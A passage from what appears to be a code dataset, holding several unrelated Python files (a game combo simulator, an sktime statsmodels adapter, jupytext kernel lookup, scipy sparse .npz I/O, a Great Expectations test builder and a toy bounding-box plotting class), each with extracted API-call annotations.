'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""encap-sharing-disable"""'], {}), "(YType.boolean, 'encap-sharing-disable')\n", (3012, 3052), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((3102, 3144), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""frr-follow-bgp-pic"""'], {}), "(YType.boolean, 'frr-follow-bgp-pic')\n", (3107, 3144), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((7051, 7091), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '"""forward-class-number"""'], {}), "(YType.str, 'forward-class-number')\n", (7056, 7091), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((7226, 7267), 'ydk.types.YLeaf', 'YLeaf', (['YType.enumeration', '"""fallback-type"""'], {}), "(YType.enumeration, 'fallback-type')\n", (7231, 7267), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((7406, 7460), 'ydk.types.YLeafList', 'YLeafList', (['YType.uint32', '"""fallback-class-number-array"""'], {}), "(YType.uint32, 'fallback-class-number-array')\n", (7415, 7460), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((10614, 10649), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '"""frr-holdtime"""'], {}), "(YType.uint32, 'frr-holdtime')\n", (10619, 10649), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n')]
"""Series of actions that form a combo chain""" from __future__ import annotations from typing import Optional, Sequence, TYPE_CHECKING from action import Action from core.utility import Array from core.constants import PlayerForm, SimActKind, MomentType from core.database import FromDB if TYPE_CHECKING: from entity.player import Player class Combos: def __init__(self, player: Player, form: PlayerForm, act_ids: Sequence[int], ex_act_ids: Optional[Sequence[int]] = None) -> None: self.player = player self.actions: Array[Action] = Array() for idx, act_id in enumerate(act_ids): self.actions.append(Action(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)) self.ex_actions = None if ex_act_ids: self.ex_actions: Array[Action] = Array() for idx, act_id in enumerate(ex_act_ids): if not act_id: self.ex_actions.append(None) continue self.ex_actions.append(Action(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)) def next(self): if self.player.current in self.actions: try: return self.actions[self.player.current.index + 1] except IndexError: pass return self.actions[1] def __repr__(self) -> str: if self.ex_actions: return "->".join(map(repr, self.actions)) + "\tEX[" + "->".join(map(repr, self.ex_actions)) + "]" return "->".join(map(repr, self.actions)) class UniqueCombos(Combos, FromDB, table="CharaUniqueCombo"): def __init__(self, id: int, player: Player) -> None: FromDB.__init__(self, id) act_ids = (self._data["_ActionId"] + i for i in range(self._data["_MaxComboNum"])) ex_act_ids = None if not self._data["_ExActionId"] else (self._data["_ExActionId"] + i for i in range(self._data["_MaxComboNum"])) Combos.__init__(self, player, PlayerForm.ADV, act_ids, ex_act_ids=ex_act_ids) if self._data["_ShiftConditionType"] == 1: self.player.events.listen(MomentType.HIT, self.enable) def enable(self, *args, **kwargs): pass class DefaultCombos(Combos, FromDB, table="WeaponType"): def __init__(self, id: int, player: Player) -> None: FromDB.__init__(self, id) act_ids = (self._data[f"_DefaultSkill{i+1:02}"] for i in range(5) if self._data[f"_DefaultSkill{i+1:02}"]) ex_act_ids = None if not self._data["_DefaultSkill05Ex"] else (0, 0, 0, 0, self._data["_DefaultSkill05Ex"]) Combos.__init__(self, player, PlayerForm.ADV, act_ids, ex_act_ids=ex_act_ids) class DragonCombos(Combos): def __init__(self, id: int, combo_max: int, player: Player) -> None: act_ids = (id + i for i in range(combo_max)) Combos.__init__(self, player, PlayerForm.DRG, act_ids)
[ "core.utility.Array", "action.Action", "core.database.FromDB.__init__" ]
[((562, 569), 'core.utility.Array', 'Array', ([], {}), '()\n', (567, 569), False, 'from core.utility import Array\n'), ((1689, 1714), 'core.database.FromDB.__init__', 'FromDB.__init__', (['self', 'id'], {}), '(self, id)\n', (1704, 1714), False, 'from core.database import FromDB\n'), ((2326, 2351), 'core.database.FromDB.__init__', 'FromDB.__init__', (['self', 'id'], {}), '(self, id)\n', (2341, 2351), False, 'from core.database import FromDB\n'), ((821, 828), 'core.utility.Array', 'Array', ([], {}), '()\n', (826, 828), False, 'from core.utility import Array\n'), ((649, 720), 'action.Action', 'Action', (['act_id', 'player'], {'kind': 'SimActKind.COMBO', 'form': 'form', 'index': '(idx + 1)'}), '(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)\n', (655, 720), False, 'from action import Action\n'), ((1031, 1102), 'action.Action', 'Action', (['act_id', 'player'], {'kind': 'SimActKind.COMBO', 'form': 'form', 'index': '(idx + 1)'}), '(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)\n', (1037, 1102), False, 'from action import Action\n')]
#!/usr/bin/env python3 -u
# -*- coding: utf-8 -*-

__author__ = ["<NAME>"]
__all__ = ["_StatsModelsAdapter"]

import numpy as np
import pandas as pd

from sktime.forecasting.base._base import DEFAULT_ALPHA
from sktime.forecasting.base._sktime import _OptionalForecastingHorizonMixin
from sktime.forecasting.base._sktime import _SktimeForecaster


class _StatsModelsAdapter(_OptionalForecastingHorizonMixin, _SktimeForecaster):
    """Base class for interfacing statsmodels forecasting algorithms"""

    _fitted_param_names = ()

    def __init__(self):
        self._forecaster = None
        self._fitted_forecaster = None
        super(_StatsModelsAdapter, self).__init__()

    def fit(self, y, X=None, fh=None):
        """Fit to training data.

        Parameters
        ----------
        y : pd.Series
            Target time series to which to fit the forecaster.
        fh : int, list or np.array, optional (default=None)
            The forecasters horizon with the steps ahead to to predict.
        X : pd.DataFrame, optional (default=None)
            Exogenous variables are ignored

        Returns
        -------
        self : returns an instance of self.
        """
        # statsmodels does not support the pd.Int64Index as required,
        # so we coerce them here to pd.RangeIndex
        if isinstance(y, pd.Series) and type(y.index) == pd.Int64Index:
            y, X = _coerce_int_to_range_index(y, X)

        self._set_y_X(y, X)
        self._set_fh(fh)
        self._fit_forecaster(y, X)
        self._is_fitted = True
        return self

    def _fit_forecaster(self, y_train, X_train=None):
        """Internal fit"""
        raise NotImplementedError("abstract method")

    def _predict(self, fh, X=None, return_pred_int=False, alpha=DEFAULT_ALPHA):
        """
        Make forecasts.

        Parameters
        ----------
        fh : ForecastingHorizon
            The forecasters horizon with the steps ahead to to predict.
            Default is one-step ahead forecast, i.e. np.array([1])
        X : pd.DataFrame, optional (default=None)
            Exogenous variables are ignored.
        return_pred_int : bool, optional (default=False)
        alpha : int or list, optional (default=0.95)

        Returns
        -------
        y_pred : pd.Series
            Returns series of predicted values.
        """
        if return_pred_int:
            raise NotImplementedError()

        # statsmodels requires zero-based indexing starting at the
        # beginning of the training series when passing integers
        start, end = fh.to_absolute_int(self._y.index[0], self.cutoff)[[0, -1]]
        y_pred = self._fitted_forecaster.predict(start, end)

        # statsmodels forecasts all periods from start to end of forecasting
        # horizon, but only return given time points in forecasting horizon
        return y_pred.loc[fh.to_absolute(self.cutoff).to_pandas()]

    def get_fitted_params(self):
        """Get fitted parameters

        Returns
        -------
        fitted_params : dict
        """
        self.check_is_fitted()
        return {
            name: self._fitted_forecaster.params.get(name)
            for name in self._get_fitted_param_names()
        }

    def _get_fitted_param_names(self):
        """Get names of fitted parameters"""
        return self._fitted_param_names


def _coerce_int_to_range_index(y, X=None):
    new_index = pd.RangeIndex(y.index[0], y.index[-1] + 1)
    try:
        np.testing.assert_array_equal(y.index, new_index)
    except AssertionError:
        raise ValueError(
            "Coercion of pd.Int64Index to pd.RangeIndex "
            "failed. Please provide `y_train` with a "
            "pd.RangeIndex."
        )
    y.index = new_index
    if X is not None:
        X.index = new_index
    return y, X
[ "numpy.testing.assert_array_equal", "pandas.RangeIndex" ]
[((3433, 3475), 'pandas.RangeIndex', 'pd.RangeIndex', (['y.index[0]', '(y.index[-1] + 1)'], {}), '(y.index[0], y.index[-1] + 1)\n', (3446, 3475), True, 'import pandas as pd\n'), ((3493, 3542), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['y.index', 'new_index'], {}), '(y.index, new_index)\n', (3522, 3542), True, 'import numpy as np\n')]
"""Find kernel specifications for a given language""" import os import sys from .languages import same_language from .reraise import reraise try: # I prefer not to take a dependency on jupyter_client from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec except ImportError as err: find_kernel_specs = reraise(err) get_kernel_spec = reraise(err) def set_kernelspec_from_language(notebook): """Set the kernel specification based on the 'main_language' metadata""" language = notebook.metadata.get("jupytext", {}).get("main_language") if "kernelspec" not in notebook.metadata and language: try: kernelspec = kernelspec_from_language(language) except ValueError: return notebook.metadata["kernelspec"] = kernelspec notebook.metadata.get("jupytext", {}).pop("main_language") def kernelspec_from_language(language): """Return the python kernel that matches the current env, or the first kernel that matches the given language""" if language == "python": # Return the kernel that matches the current Python executable for name in find_kernel_specs(): kernel_specs = get_kernel_spec(name) cmd = kernel_specs.argv[0] if ( kernel_specs.language == "python" and os.path.isfile(cmd) and os.path.samefile(cmd, sys.executable) ): return { "name": name, "language": language, "display_name": kernel_specs.display_name, } raise ValueError( "No kernel found that matches the current python executable {}\n".format( sys.executable ) + "Install one with 'python -m ipykernel install --name kernel_name [--user]'" ) for name in find_kernel_specs(): kernel_specs = get_kernel_spec(name) if same_language(kernel_specs.language, language): return { "name": name, "language": language, "display_name": kernel_specs.display_name, } raise ValueError("No kernel found for the language {}".format(language))
[ "jupyter_client.kernelspec.find_kernel_specs", "jupyter_client.kernelspec.get_kernel_spec", "os.path.samefile", "os.path.isfile" ]
[((1903, 1922), 'jupyter_client.kernelspec.find_kernel_specs', 'find_kernel_specs', ([], {}), '()\n', (1920, 1922), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1157, 1176), 'jupyter_client.kernelspec.find_kernel_specs', 'find_kernel_specs', ([], {}), '()\n', (1174, 1176), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1947, 1968), 'jupyter_client.kernelspec.get_kernel_spec', 'get_kernel_spec', (['name'], {}), '(name)\n', (1962, 1968), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1205, 1226), 'jupyter_client.kernelspec.get_kernel_spec', 'get_kernel_spec', (['name'], {}), '(name)\n', (1220, 1226), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\n'), ((1353, 1372), 'os.path.isfile', 'os.path.isfile', (['cmd'], {}), '(cmd)\n', (1367, 1372), False, 'import os\n'), ((1393, 1430), 'os.path.samefile', 'os.path.samefile', (['cmd', 'sys.executable'], {}), '(cmd, sys.executable)\n', (1409, 1430), False, 'import os\n')]
import numpy as np
import scipy.sparse

__all__ = ['save_npz', 'load_npz']


# Make loading safe vs. malicious input
PICKLE_KWARGS = dict(allow_pickle=False)


def save_npz(file, matrix, compressed=True):
    """ Save a sparse matrix to a file using ``.npz`` format.

    Parameters
    ----------
    file : str or file-like object
        Either the file name (string) or an open file (file-like object)
        where the data will be saved. If file is a string, the ``.npz``
        extension will be appended to the file name if it is not already
        there.
    matrix: spmatrix (format: ``csc``, ``csr``, ``bsr``, ``dia`` or coo``)
        The sparse matrix to save.
    compressed : bool, optional
        Allow compressing the file. Default: True

    See Also
    --------
    scipy.sparse.load_npz: Load a sparse matrix from a file using ``.npz`` format.
    numpy.savez: Save several arrays into a ``.npz`` archive.
    numpy.savez_compressed : Save several arrays into a compressed ``.npz`` archive.

    Examples
    --------
    Store sparse matrix to disk, and load it again:

    >>> import scipy.sparse
    >>> sparse_matrix = scipy.sparse.csc_matrix(np.array([[0, 0, 3], [4, 0, 0]]))
    >>> sparse_matrix
    <2x3 sparse matrix of type '<class 'numpy.int64'>'
       with 2 stored elements in Compressed Sparse Column format>
    >>> sparse_matrix.todense()
    matrix([[0, 0, 3],
            [4, 0, 0]], dtype=int64)

    >>> scipy.sparse.save_npz('/tmp/sparse_matrix.npz', sparse_matrix)
    >>> sparse_matrix = scipy.sparse.load_npz('/tmp/sparse_matrix.npz')

    >>> sparse_matrix
    <2x3 sparse matrix of type '<class 'numpy.int64'>'
       with 2 stored elements in Compressed Sparse Column format>
    >>> sparse_matrix.todense()
    matrix([[0, 0, 3],
            [4, 0, 0]], dtype=int64)
    """
    arrays_dict = {}
    if matrix.format in ('csc', 'csr', 'bsr'):
        arrays_dict.update(indices=matrix.indices, indptr=matrix.indptr)
    elif matrix.format == 'dia':
        arrays_dict.update(offsets=matrix.offsets)
    elif matrix.format == 'coo':
        arrays_dict.update(row=matrix.row, col=matrix.col)
    else:
        raise NotImplementedError('Save is not implemented for sparse matrix of format {}.'.format(matrix.format))
    arrays_dict.update(
        format=matrix.format.encode('ascii'),
        shape=matrix.shape,
        data=matrix.data
    )
    if compressed:
        np.savez_compressed(file, **arrays_dict)
    else:
        np.savez(file, **arrays_dict)


def load_npz(file):
    """ Load a sparse matrix from a file using ``.npz`` format.

    Parameters
    ----------
    file : str or file-like object
        Either the file name (string) or an open file (file-like object)
        where the data will be loaded.

    Returns
    -------
    result : csc_matrix, csr_matrix, bsr_matrix, dia_matrix or coo_matrix
        A sparse matrix containing the loaded data.

    Raises
    ------
    OSError
        If the input file does not exist or cannot be read.

    See Also
    --------
    scipy.sparse.save_npz: Save a sparse matrix to a file using ``.npz`` format.
    numpy.load: Load several arrays from a ``.npz`` archive.

    Examples
    --------
    Store sparse matrix to disk, and load it again:

    >>> import scipy.sparse
    >>> sparse_matrix = scipy.sparse.csc_matrix(np.array([[0, 0, 3], [4, 0, 0]]))
    >>> sparse_matrix
    <2x3 sparse matrix of type '<class 'numpy.int64'>'
       with 2 stored elements in Compressed Sparse Column format>
    >>> sparse_matrix.todense()
    matrix([[0, 0, 3],
            [4, 0, 0]], dtype=int64)

    >>> scipy.sparse.save_npz('/tmp/sparse_matrix.npz', sparse_matrix)
    >>> sparse_matrix = scipy.sparse.load_npz('/tmp/sparse_matrix.npz')

    >>> sparse_matrix
    <2x3 sparse matrix of type '<class 'numpy.int64'>'
       with 2 stored elements in Compressed Sparse Column format>
    >>> sparse_matrix.todense()
    matrix([[0, 0, 3],
            [4, 0, 0]], dtype=int64)
    """
    with np.load(file, **PICKLE_KWARGS) as loaded:
        try:
            matrix_format = loaded['format']
        except KeyError as e:
            raise ValueError('The file {} does not contain a sparse matrix.'.format(file)) from e

        matrix_format = matrix_format.item()

        if not isinstance(matrix_format, str):
            # Play safe with Python 2 vs 3 backward compatibility;
            # files saved with SciPy < 1.0.0 may contain unicode or bytes.
            matrix_format = matrix_format.decode('ascii')

        try:
            cls = getattr(scipy.sparse, '{}_matrix'.format(matrix_format))
        except AttributeError as e:
            raise ValueError('Unknown matrix format "{}"'.format(matrix_format)) from e

        if matrix_format in ('csc', 'csr', 'bsr'):
            return cls((loaded['data'], loaded['indices'], loaded['indptr']), shape=loaded['shape'])
        elif matrix_format == 'dia':
            return cls((loaded['data'], loaded['offsets']), shape=loaded['shape'])
        elif matrix_format == 'coo':
            return cls((loaded['data'], (loaded['row'], loaded['col'])), shape=loaded['shape'])
        else:
            raise NotImplementedError('Load is not implemented for '
                                      'sparse matrix of format {}.'.format(matrix_format))
[ "numpy.savez_compressed", "numpy.load", "numpy.savez" ]
[((2426, 2466), 'numpy.savez_compressed', 'np.savez_compressed', (['file'], {}), '(file, **arrays_dict)\n', (2445, 2466), True, 'import numpy as np\n'), ((2485, 2514), 'numpy.savez', 'np.savez', (['file'], {}), '(file, **arrays_dict)\n', (2493, 2514), True, 'import numpy as np\n'), ((4018, 4048), 'numpy.load', 'np.load', (['file'], {}), '(file, **PICKLE_KWARGS)\n', (4025, 4048), True, 'import numpy as np\n')]
# Copyright 2022 Collate # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ TestCase builder """ from metadata.generated.schema.api.tests.createTableTest import CreateTableTestRequest from metadata.generated.schema.tests.table import tableRowCountToEqual from metadata.generated.schema.tests.tableTest import TableTestType from metadata.great_expectations.builders.table.base_table_test_builders import ( BaseTableTestBuilder, ) class TableRowCountToEqualBuilder(BaseTableTestBuilder): """Builder for `expect_table_row_count_to_equal` GE expectation""" def _build_test(self) -> CreateTableTestRequest: """Specific test builder for the test""" return self.build_test_request( config=tableRowCountToEqual.TableRowCountToEqual( value=self.result["expectation_config"]["kwargs"]["value"], ), test_type=TableTestType.tableRowCountToEqual, )
[ "metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual" ]
[((1225, 1331), 'metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual', 'tableRowCountToEqual.TableRowCountToEqual', ([], {'value': "self.result['expectation_config']['kwargs']['value']"}), "(value=self.result[\n 'expectation_config']['kwargs']['value'])\n", (1266, 1331), False, 'from metadata.generated.schema.tests.table import tableRowCountToEqual\n')]
'''
This code is based on https://github.com/jrieke/shape-detection/
'''
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
import tensorflow as tf
import datetime


class JriekeBboxDataset:
    def generate(self):
        print('Generating...')
        self.WIDTH = 8
        self.HEIGHT = 8
        num_imgs = 50000

        min_object_size = 1
        max_object_size = 4
        num_objects = 1

        self.bboxes = np.zeros((num_imgs, num_objects, 4))
        self.imgs = np.zeros((num_imgs, self.WIDTH, self.HEIGHT))  # set background to 0

        for i_img in range(num_imgs):
            for i_object in range(num_objects):
                w, h = np.random.randint(min_object_size, max_object_size, size=2)
                x = np.random.randint(0, self.WIDTH - w)
                y = np.random.randint(0, self.HEIGHT - h)
                self.imgs[i_img, y:y+h, x:x+w] = 1.  # set rectangle to 1
                self.bboxes[i_img, i_object] = [x, y, w, h]
        print("Shapes: imgs ", self.imgs.shape, " bboxes ", self.bboxes.shape)

        # why this?
        # X = (self.imgs.reshape(num_imgs, -1) - np.mean(self.imgs)) / np.std(self.imgs)
        X = self.imgs
        y = self.bboxes.reshape(num_imgs, -1) / self.WIDTH

        # Split training and test.
        i = int(0.8 * num_imgs)
        train_X = X[:i]  # 80% for training
        test_X = X[i:]
        train_y = y[:i]
        test_y = y[i:]
        self.test_imgs = self.imgs[i:]
        self.test_bboxes = self.bboxes[i:]
        return train_X, train_y, test_X, test_y

    def check_dataset_image_compability(self, test_X_sample, test_imgs_sample):
        fig = plt.figure(figsize=(12, 3))
        fig.suptitle('check if the generated imgs match to the test_X slice image')
        fig.subplots_adjust(top=0.85)

        plt.subplot(1, 2, 1)
        plt.gca().set_title('Returned by the dataset class: used for training')
        plt.imshow(test_X_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])

        plt.subplot(1, 2, 2)
        plt.gca().set_title('Global image holder: used for plotting.')
        plt.imshow(test_imgs_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
        plt.show()
        print('compare:', TMP, test_imgs_sample)

    def IOU(self, bbox1, bbox2):
        '''Calculate overlap between two bounding boxes [x, y, w, h] as the area of intersection over the area of unity'''
        x1, y1, w1, h1 = bbox1[0], bbox1[1], bbox1[2], bbox1[3]
        x2, y2, w2, h2 = bbox2[0], bbox2[1], bbox2[2], bbox2[3]

        w_I = min(x1 + w1, x2 + w2) - max(x1, x2)
        h_I = min(y1 + h1, y2 + h2) - max(y1, y2)
        if w_I <= 0 or h_I <= 0:  # no overlap
            return 0.
        I = w_I * h_I
        U = w1 * h1 + w2 * h2 - I
        return I / U

    def convertDefaultAnnotToCoord(self, annot):
        '''
        annot -> [x, y, w, h]
        '''
        w = annot[2] * self.WIDTH
        h = annot[3] * self.HEIGHT
        x = annot[0] * self.HEIGHT
        y = annot[1] * self.HEIGHT
        return [x, y, w, h]

    def convertYoloAnnotToCoord(self, yolo_annot):
        '''
        yolo_annot -> [x, y, w, h]
        '''
        w = yolo_annot[2] * self.WIDTH
        h = yolo_annot[3] * self.HEIGHT
        x = (yolo_annot[0] * self.WIDTH) - (w/2)
        y = (yolo_annot[1] * self.HEIGHT) - (h/2)
        return [x, y, w, h]

    def show_generated(self, i=0):
        fig = plt.figure()
        fig.subplots_adjust(top=0.85)
        fig.suptitle('Generated image sample + GT')
        plt.imshow(self.imgs[i], cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
        for bbox in self.bboxes[i]:
            plt.gca().add_patch(matplotlib.patches.Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r', fc='none'))
        plt.gca().legend(['GT'])
        plt.show()

    def plot_rectangle(self, img, bbox):
        fig = plt.figure()
        fig.suptitle('Plotting rectangle.')
        fig.subplots_adjust(top=0.85)

        plt.subplot(1, 1, 1)
        plt.imshow(img, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
        plt.gca().add_patch(matplotlib.patches.Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r', fc='none'))
        plt.show()

    def check_dataset_image_compability(self, test_X_sample, test_imgs_sample):
        fig = plt.figure(figsize=(12, 3))
        fig.suptitle('check if the generated imgs match to the test_X slice image')
        fig.subplots_adjust(top=0.85)

        plt.subplot(1, 2, 1)
        plt.gca().set_title('Returned by the dataset class: used for training')
        plt.imshow(test_X_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])

        plt.subplot(1, 2, 2)
        plt.gca().set_title('Global image holder: used for plotting.')
        plt.imshow(test_imgs_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
        plt.show()
        print('compare:', test_X_sample, test_imgs_sample)

    def show_predicted(self, pred_bboxes):
        # Show a few images and predicted bounding boxes from the test dataset.
        fig = plt.figure(figsize=(12, 3))
        fig.subplots_adjust(top=0.85)
        fig.suptitle('Prediction demonstration. Random samples.')
        legend_plotted = False
        for i_subplot in range(1, 11):
            plt.subplot(1, 10, i_subplot)
            i = np.random.randint(len(pred_bboxes))
            plt.imshow(self.test_imgs[i], cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])
            for pred_bbox, exp_bbox in zip(pred_bboxes[i], self.test_bboxes[i]):
                # print('before convertion: pred',pred_bbox, 'gt',exp_bbox)
                pred_bbox = self.convertDefaultAnnotToCoord(pred_bbox)
                # exp_bbox = self.convertDefaultAnnotToCoord(exp_bbox)
                print('after convertion: pred', pred_bbox, 'gt', exp_bbox)
                plt.gca().add_patch(matplotlib.patches.Rectangle((pred_bbox[0], pred_bbox[1]), pred_bbox[2], pred_bbox[3], ec='r', fc='none'))
                # gt
                plt.gca().add_patch(matplotlib.patches.Rectangle((exp_bbox[0], exp_bbox[1]), exp_bbox[2], exp_bbox[3], ec='b', fc='none'))
                plt.annotate('IOU: {:.2f}'.format(self.IOU(pred_bbox, exp_bbox)), (pred_bbox[0], pred_bbox[1]+pred_bbox[3]+0.2), color='r')
                if not legend_plotted:
                    legend_plotted = True
                    plt.gca().legend(['Pred', 'GT'], loc='upper center', bbox_to_anchor=(0.5, -0.5), fancybox=True)
        plt.show()
        # plt.savefig('plots/bw-single-rectangle_prediction_{0:%Y-%m-%d%H:%M:%S}.png'.format(datetime.datetime.now()), dpi=300)
[ "matplotlib.pyplot.imshow", "matplotlib.patches.Rectangle", "matplotlib.pyplot.gca", "numpy.zeros", "matplotlib.pyplot.figure", "numpy.random.randint", "matplotlib.pyplot.subplot", "matplotlib.pyplot.show" ]
[((440, 476), 'numpy.zeros', 'np.zeros', (['(num_imgs, num_objects, 4)'], {}), '((num_imgs, num_objects, 4))\n', (448, 476), True, 'import numpy as np\n'), ((497, 542), 'numpy.zeros', 'np.zeros', (['(num_imgs, self.WIDTH, self.HEIGHT)'], {}), '((num_imgs, self.WIDTH, self.HEIGHT))\n', (505, 542), True, 'import numpy as np\n'), ((1662, 1689), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\n', (1672, 1689), True, 'import matplotlib.pyplot as plt\n'), ((1821, 1841), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\n', (1832, 1841), True, 'import matplotlib.pyplot as plt\n'), ((1930, 2052), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_X_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_X_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (1940, 2052), True, 'import matplotlib.pyplot as plt\n'), ((2057, 2077), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\n', (2068, 2077), True, 'import matplotlib.pyplot as plt\n'), ((2157, 2282), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_imgs_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_imgs_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (2167, 2282), True, 'import matplotlib.pyplot as plt\n'), ((2286, 2296), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2294, 2296), True, 'import matplotlib.pyplot as plt\n'), ((3515, 3527), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (3525, 3527), True, 'import matplotlib.pyplot as plt\n'), ((3626, 3746), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.imgs[i]'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(self.imgs[i], cmap='Greys', interpolation='none', origin='lower',\n extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (3636, 3746), True, 'import matplotlib.pyplot as plt\n'), ((3943, 3953), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3951, 3953), True, 'import matplotlib.pyplot as plt\n'), ((4011, 4023), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4021, 4023), True, 'import matplotlib.pyplot as plt\n'), ((4115, 4135), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(1)', '(1)'], {}), '(1, 1, 1)\n', (4126, 4135), True, 'import matplotlib.pyplot as plt\n'), ((4144, 4256), 'matplotlib.pyplot.imshow', 'plt.imshow', (['img'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(img, cmap='Greys', interpolation='none', origin='lower', extent=\n [0, self.WIDTH, 0, self.HEIGHT])\n", (4154, 4256), True, 'import matplotlib.pyplot as plt\n'), ((4375, 4385), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4383, 4385), True, 'import matplotlib.pyplot as plt\n'), ((4481, 4508), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\n', (4491, 4508), True, 'import matplotlib.pyplot as plt\n'), ((4640, 4660), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\n', (4651, 4660), True, 'import matplotlib.pyplot as plt\n'), ((4749, 4871), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_X_sample'], {'cmap': 
'"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_X_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (4759, 4871), True, 'import matplotlib.pyplot as plt\n'), ((4876, 4896), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\n', (4887, 4896), True, 'import matplotlib.pyplot as plt\n'), ((4976, 5101), 'matplotlib.pyplot.imshow', 'plt.imshow', (['test_imgs_sample'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(test_imgs_sample, cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (4986, 5101), True, 'import matplotlib.pyplot as plt\n'), ((5105, 5115), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5113, 5115), True, 'import matplotlib.pyplot as plt\n'), ((5312, 5339), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3)'}), '(figsize=(12, 3))\n', (5322, 5339), True, 'import matplotlib.pyplot as plt\n'), ((6760, 6770), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6768, 6770), True, 'import matplotlib.pyplot as plt\n'), ((4280, 4369), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(bbox[0], bbox[1])', 'bbox[2]', 'bbox[3]'], {'ec': '"""r"""', 'fc': '"""none"""'}), "((bbox[0], bbox[1]), bbox[2], 